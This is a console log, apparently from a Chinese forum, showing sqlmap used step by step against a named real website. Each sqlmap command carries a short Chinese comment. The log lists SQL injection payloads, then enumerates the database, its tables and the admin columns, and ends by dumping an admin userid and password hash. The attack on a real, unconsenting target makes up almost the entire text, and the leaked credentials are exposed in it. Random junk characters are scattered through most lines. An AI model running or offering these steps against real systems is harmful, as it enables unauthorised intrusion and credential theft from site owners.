D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db' A3 I- a8 O ]; p/ j* h2 l
ms "Mysql" --current-user /* 注解:获取当前用户名称: Q( f; w' B3 y! ^
sqlmap/0.9 - automatic SQL injection and database takeover tool
0 ?8 Z- I% M, {+ Z% x8 S. a5 m% h http://sqlmap.sourceforge.net starting at: 16:53:54
' w; x! o8 w7 n" v! Z3 i[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as' ^" f9 @! p! w9 A
session file p. F2 ^8 F" b# M; C0 u
[16:53:54] [INFO] resuming injection data from session file
/ E; }! W+ c9 K1 g" |. {[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
4 L) V8 d5 a6 \9 ^+ ?! i8 \) ^[16:53:54] [INFO] testing connection to the target url
! A% _5 x+ Q0 s) E* @" Dsqlmap identified the following injection points with a total of 0 HTTP(s) reque
& O G+ a* Q) x0 o1 g. Psts:' F) D; {% ~0 D3 g
---
$ ]/ P- H+ U/ u" IPlace: GET1 M7 w) |( x8 x$ a2 O" L
Parameter: id5 j% t. f: p# d6 b, q
Type: boolean-based blind
- I$ p, g% S% V! {) j Title: AND boolean-based blind - WHERE or HAVING clause6 g+ I- ?9 X4 Q; K+ ~- X
Payload: id=276 AND 799=799
* f- {! _' b3 w- O! q4 T7 r3 j Type: error-based
& { x( _2 G, T0 A# T Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
8 d# Y7 Y( p3 G Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
3 A1 J3 h3 g. e k& X; |120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58, e2 i- D- l. ]$ h1 U) Y; f
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)5 w$ D5 t0 H% ^/ R+ H7 E2 V5 K( k$ o
Type: UNION query0 w* F3 O4 z0 j+ d& ^* E3 |
Title: MySQL UNION query (NULL) - 1 to 10 columns: c0 A" J7 X; c5 t6 }
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR& R. Z; D' f) t3 W
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
" f% k+ `3 P' M9 z* ^CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#0 g9 o, `4 @. w7 ]4 J& T1 B
Type: AND/OR time-based blind
+ _0 A0 y& d% o! p* ], ~ Title: MySQL > 5.0.11 AND time-based blind
6 D6 g g. N+ e) n# j% w Payload: id=276 AND SLEEP(5)
) }% \0 d& I/ h5 l' j---
. J. Z, Q# M# v3 O/ V* q8 F& k0 g[16:53:55] [INFO] the back-end DBMS is MySQL
! r9 ?5 _2 g4 Q0 V& f5 v+ qweb server operating system: Windows
# U; I# n r% [web application technology: Apache 2.2.11, PHP 5.3.0# q, }: c- E1 N4 I
back-end DBMS: MySQL 5.0, Q+ d2 r/ d O3 e
[16:53:55] [INFO] fetching current user! v8 n/ t8 G* p% \4 C* _' c
current user: 'root@localhost'
5 W& L$ J- ~# P+ w* D/ _ _- @[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou2 n* T1 n' n( o- i- T8 X
tput\www.wepost.com.hk' shutting down at: 16:53:58, p3 `! e8 B1 J" Q" W' x; r& I; s
' m- N4 e2 c9 D9 L! h9 J) XD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db0 f) [7 E* j# o3 F! y+ B/ o m
ms "Mysql" --current-db /*当前数据库
1 \% g; z: _* v1 _5 N6 W sqlmap/0.9 - automatic SQL injection and database takeover tool/ a8 k0 H& o$ G& y
http://sqlmap.sourceforge.net starting at: 16:54:161 S4 e8 L& T, t: n. S" I8 ]; _% l
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as) N, t8 {5 r6 _# H5 ?
session file
; b" \0 ~! c4 p! t( @& u[16:54:16] [INFO] resuming injection data from session file4 [ h7 I& G. u' I
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file1 Y1 O. D" @5 o7 u3 w1 W4 G
[16:54:16] [INFO] testing connection to the target url6 G% x/ S: P3 J, m) a1 t0 a
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
8 k9 X& n) G0 y! G0 Asts:1 N$ h& ^: P, p' z& U
---
& o+ M1 G L2 ~. H8 aPlace: GET P7 n y% X8 C. h8 O, W
Parameter: id
" C4 B! O/ H. l; ? Type: boolean-based blind- Z4 e8 t3 {7 K& \
Title: AND boolean-based blind - WHERE or HAVING clause
7 X9 d1 z3 d! j& W' E3 v% o+ | Payload: id=276 AND 799=799: F2 ~. f d8 H: _
Type: error-based
/ G# O7 r, X9 e2 R# R7 C) q- X% P# F Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
G7 [+ e8 k& E/ r% j Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
2 b9 L. K1 l/ X7 [120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
4 [& a9 O P* b2 [),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a); g8 J* C+ ?. z3 x" Z
Type: UNION query* A$ o* `+ M$ ?! ` c! k
Title: MySQL UNION query (NULL) - 1 to 10 columns
& w( E8 |3 m& o- w0 N% [7 a; J Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR* W# H- r- L/ T; Y I
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
! U, v1 H1 c j3 g3 J/ ~CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
# a+ M" C- `! r+ b. |$ ^ Type: AND/OR time-based blind
6 h) B8 V' A" x. e4 } Title: MySQL > 5.0.11 AND time-based blind
1 h! E# x( {- E Payload: id=276 AND SLEEP(5) t) \1 R. R* J4 G1 K1 B
---
% W; j: Q+ l7 y$ x- M6 c5 T[16:54:17] [INFO] the back-end DBMS is MySQL
' z3 I0 N1 ?$ \web server operating system: Windows
" ^$ X* P4 D( q) L# [web application technology: Apache 2.2.11, PHP 5.3.05 _: x! u) f: S+ }# `" s1 ]
back-end DBMS: MySQL 5.0( @+ e7 S* h4 B; ~0 @3 k; {
[16:54:17] [INFO] fetching current database5 Q2 \9 g" {+ \; g
current database: 'wepost': k+ f; H# h- ~- c% p
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
$ V+ h2 ]( g+ wtput\www.wepost.com.hk' shutting down at: 16:54:18/ v1 t8 l, Q2 o" W
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db! X" Z5 z3 k( I
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名& M9 y& m7 i8 ?0 i/ D1 Z
sqlmap/0.9 - automatic SQL injection and database takeover tool; p7 a7 D' R# z0 a( Z: E
http://sqlmap.sourceforge.net starting at: 16:55:257 b! T$ C _/ h: g4 n1 E) j
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
$ u0 f8 h0 b: r. Z session file
2 O* k9 {8 G% e7 @( Y[16:55:25] [INFO] resuming injection data from session file
k; [7 m9 J) E; Y2 W. |, a9 r[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file! L9 J2 n) D) z
[16:55:25] [INFO] testing connection to the target url
' n# t" W) ]3 m/ Y) lsqlmap identified the following injection points with a total of 0 HTTP(s) reque
9 K4 X {% D, K! m/ L+ Fsts:
* A6 R% \0 u0 M2 K# G" O6 M---
7 l F3 S4 U4 i- VPlace: GET* l+ F& C9 {, e/ R2 O0 R
Parameter: id3 Z; a' e5 q4 k- p- n
Type: boolean-based blind6 U: d- N" n8 E2 o; b9 b% ^
Title: AND boolean-based blind - WHERE or HAVING clause
# h. w4 X- Z6 s0 B Payload: id=276 AND 799=7990 E, z- c. ]& @" n$ c. t
Type: error-based
; O; {8 I5 Y5 A3 F Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& Q4 ~" ]9 k3 G
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
8 @( Q9 z/ S W9 j120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ k* |( |7 G8 b; l; {" P5 l7 f
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
6 X9 B; t* ?) Z/ n1 j# l7 d Type: UNION query, i' w- D+ J0 V/ I$ ~4 h
Title: MySQL UNION query (NULL) - 1 to 10 columns
# b6 O1 ^- O( k% p: m Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
; H m9 m2 V1 ^' D! c& [3 L) h(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
0 M8 \ g4 d, B# [* n4 _7 |3 a" k' ZCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ @" H8 C& J7 z4 @( {2 D- g' Y
Type: AND/OR time-based blind
: Q9 l2 I+ B9 [; v3 c3 b Title: MySQL > 5.0.11 AND time-based blind
; g0 J' P% }. a2 y' B" a Payload: id=276 AND SLEEP(5)6 e" z0 h! J. c; e7 P% X4 D- j
---( s1 v" k; C/ K
[16:55:26] [INFO] the back-end DBMS is MySQL) p/ h8 \6 A; m
web server operating system: Windows; f f! n1 G* u) |* j
web application technology: Apache 2.2.11, PHP 5.3.0
$ T/ Q. [1 h# \- q9 Y8 Eback-end DBMS: MySQL 5.0, S8 o, g9 w' b0 u$ ~) p! v, L
[16:55:26] [INFO] fetching tables for database 'wepost'% I O4 \ [. {4 G$ k
[16:55:27] [INFO] the SQL query used returns 6 entries
4 Z0 j4 Y- d7 |% L4 @Database: wepost
/ R G% D* T8 q( E: p) F$ c[6 tables], q9 n: y8 i$ h5 r. G. K6 t
+-------------+
5 D4 C/ T! I3 j4 @' v& t5 ]| admin |$ z; ~, R3 e. W9 }/ U
| article |
& n# y% |& Z+ N6 M: P3 _8 a. \! {& P| contributor |
. n$ J, Z! j0 i% a4 S1 y+ k| idea |9 S/ M, j1 Z9 K
| image |
) Z5 u( k: d; O+ w. P; S| issue |
' \) E6 g ~8 R+-------------+' R) c3 I% u, F8 i( U6 J
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
. P8 T/ ~2 d& |- Ftput\www.wepost.com.hk' shutting down at: 16:55:33
# m' s M8 e* j# V# b5 e$ k6 R2 _7 w6 V4 i5 ]/ Q8 T. F
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db3 d5 z" `1 i7 W/ L
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名8 q! b3 @! t. @! [" L
sqlmap/0.9 - automatic SQL injection and database takeover tool& U5 g3 j3 b; W1 O
http://sqlmap.sourceforge.net starting at: 16:56:06
) c5 r) f/ B0 S/ R) D8 {sqlmap identified the following injection points with a total of 0 HTTP(s) reque
7 |6 }. g3 l& c% M- `3 L1 K6 bsts:6 z/ H3 L/ C; g! R, J
---
5 r! C! i" Q! \ c0 q3 p( J {Place: GET- [2 |: o6 R z% h
Parameter: id
' A8 Z B" y# V3 ?" O0 u Type: boolean-based blind; T9 Q" c. v; c' w
Title: AND boolean-based blind - WHERE or HAVING clause
, d& ?% M& S7 q, ]6 F" D8 B3 l Payload: id=276 AND 799=799
$ J _! {% m6 V5 w# O Y: \2 { Type: error-based
- D3 l) Z8 e& \ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
$ I6 \& K1 o1 W: {9 x Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
5 Y! s& F7 S% y( J120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,580 ~3 D3 L2 u5 |7 x
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
0 C: z6 H5 E6 B. U& r Type: UNION query
( H/ t, ~. w' V! }9 u) t Title: MySQL UNION query (NULL) - 1 to 10 columns) R$ T1 ?6 a: \- R, a% D' O
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
* [: j* M% q; ` n3 }(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 z6 u* K2 C: b( o8 i) \
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#* b) L* g2 V7 }( h
Type: AND/OR time-based blind
: k- k2 K0 c1 ` Title: MySQL > 5.0.11 AND time-based blind! v) V' n$ ~, Q S5 |8 f7 @0 m
Payload: id=276 AND SLEEP(5)# j+ z# D& `$ p8 I: j6 M
---
# J1 _$ u: \1 h* Pweb server operating system: Windows
0 i6 _3 B, Y5 n" F8 }5 Tweb application technology: Apache 2.2.11, PHP 5.3.0; ^; T6 D5 x. A* f9 q, k
back-end DBMS: MySQL 5.0, Y" @6 G7 c! a
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
2 f/ m E0 g: _+ ?2 P- [) R5 Jssion': wepost, wepost
. ?' q) N( A+ z! `# r0 ?7 }Database: wepost
h' ?# m7 Q: D3 h; i6 \5 wTable: admin
7 b! b! |- N' B( C! P# J: a6 r/ v[4 columns]
; r1 X i( |- F* {. @+----------+-------------+* V5 D# X+ b/ z; W& T' c7 l
| Column | Type |
+ G! K5 a( h. R6 J3 c+----------+-------------+5 }& Q+ h/ R1 S& Z6 N9 k
| id | int(11) |0 _0 e, |& l4 m% P4 Q0 @% Z h8 i
| password | varchar(32) |
1 I- v1 e$ r' I1 y| type | varchar(10) |
; v6 x0 n, p4 H; Q9 J7 A" M| userid | varchar(20) |
: s) `/ O5 _0 `) {0 X$ Y7 V+----------+-------------+
5 r" x0 [* t4 P5 N5 P shutting down at: 16:56:19& R& k* H% |5 a! F
2 [' d6 L6 l! r5 ]
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* H" l5 w2 q+ v' M# G
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
! X% R3 ~2 V: ^! D' K. E sqlmap/0.9 - automatic SQL injection and database takeover tool
. E! ~; x4 Z( b' H! v6 | B: R http://sqlmap.sourceforge.net starting at: 16:57:14
) @" c- ^ s! F% _* G( [! fsqlmap identified the following injection points with a total of 0 HTTP(s) reque" D; f: B- r% ^/ s
sts:: {3 ?% D& |& E4 T& V/ t
---, |% r2 P! e; g8 O- K
Place: GET
) l% H+ \; J$ PParameter: id
) D' T# A) ~% B3 A Type: boolean-based blind7 o. i+ W/ O0 X6 t- c
Title: AND boolean-based blind - WHERE or HAVING clause
5 @. {/ H0 _' L Payload: id=276 AND 799=799
, x0 h$ h/ x( H0 ] Type: error-based
2 s1 f J! R" l" c1 a) S( I, E Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
, x0 n2 q* S6 |' G6 I Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
/ t" L j' B; L( q5 F. N) K. o! R, U120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: p( w# [' `' M. k3 ^8 K
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)8 S! v. v2 W, b6 ?( \, K& R
Type: UNION query
7 [* }0 @) O8 e Title: MySQL UNION query (NULL) - 1 to 10 columns4 e$ @- E3 y! D o. F
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
: y' r& F9 m* Y% Y( [$ q i) l(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),8 C" Z4 i* _ x$ M" I
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
z) A& L& E" g3 |, B Type: AND/OR time-based blind
3 H% x2 u* J( t( Z) {' t Title: MySQL > 5.0.11 AND time-based blind }- [ J6 o# n4 p Z8 | q5 J
Payload: id=276 AND SLEEP(5)
/ H2 Q5 D }/ h# K---
% [ r0 N" K1 j* Q/ {web server operating system: Windows5 [3 F/ l, C: ^# @6 H
web application technology: Apache 2.2.11, PHP 5.3.0
6 l5 s/ T1 d# N5 \& i6 oback-end DBMS: MySQL 5.0: f1 l" M( t0 D' b3 a3 U, a
recognized possible password hash values. do you want to use dictionary attack o# F; u8 [5 u5 N5 Y1 E
n retrieved table items? [Y/n/q] y, g; L/ D7 n' a4 x
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
, S0 @+ b4 k3 S: }- T" Ldo you want to use common password suffixes? (slow!) [y/N] y, B0 f9 @3 s% w/ k& E( J! {
Database: wepost
" C) Q$ F- i' |* V; z1 Z8 n& jTable: admin
1 [. |* X9 ]* v" l' h" I W0 A[1 entry]
4 @/ O8 P2 R! U( s W( x5 E+----------------------------------+------------++ ]) q! }/ f5 T7 \* E2 z
| password | userid |
3 t+ {6 x8 B! ?- L) x% M+----------------------------------+------------+
7 f" A/ _, G& ~6 g# h/ y| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |" f. Z+ \+ a" U+ m4 U3 }, m: u# D) s+ }+ H' \
+----------------------------------+------------+
) v+ j4 `, B6 `3 X shutting down at: 16:58:147 G( ?1 m& p: D2 j! ^6 K6 }! Y
9 h$ i2 P: ~. OD:\Python27\sqlmap> |